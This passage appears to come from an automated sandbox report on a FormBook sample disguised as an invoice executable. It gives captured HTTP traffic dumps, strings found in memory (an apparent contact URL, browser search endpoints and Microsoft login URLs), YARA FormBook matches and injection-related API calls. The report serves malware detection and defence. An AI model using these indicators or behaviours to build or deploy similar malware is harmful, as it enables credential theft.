6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:03 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 21 Jan 2025 12:27:09 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
                Source: 2zqVCuEmR.exe, 00000007.00000002.2645828359.0000000004D8C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.corellia.pro
                Source: 2zqVCuEmR.exe, 00000007.00000002.2645828359.0000000004D8C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.corellia.pro/eee1/
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: secinit.exe, 00000006.00000003.1943079432.0000000007AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: INVOICE, PACKING LIST, COPY BL.exe
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0042CB93 NtClose,3_2_0042CB93
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672B60 NtClose,LdrInitializeThunk,3_2_01672B60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01672DF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01672C70
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016735C0 NtCreateMutant,LdrInitializeThunk,3_2_016735C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01674340 NtSetContextThread,3_2_01674340
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01674650 NtSuspendThread,3_2_01674650
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672BE0 NtQueryValueKey,3_2_01672BE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672BF0 NtAllocateVirtualMemory,3_2_01672BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672BA0 NtEnumerateValueKey,3_2_01672BA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672B80 NtQueryInformationFile,3_2_01672B80
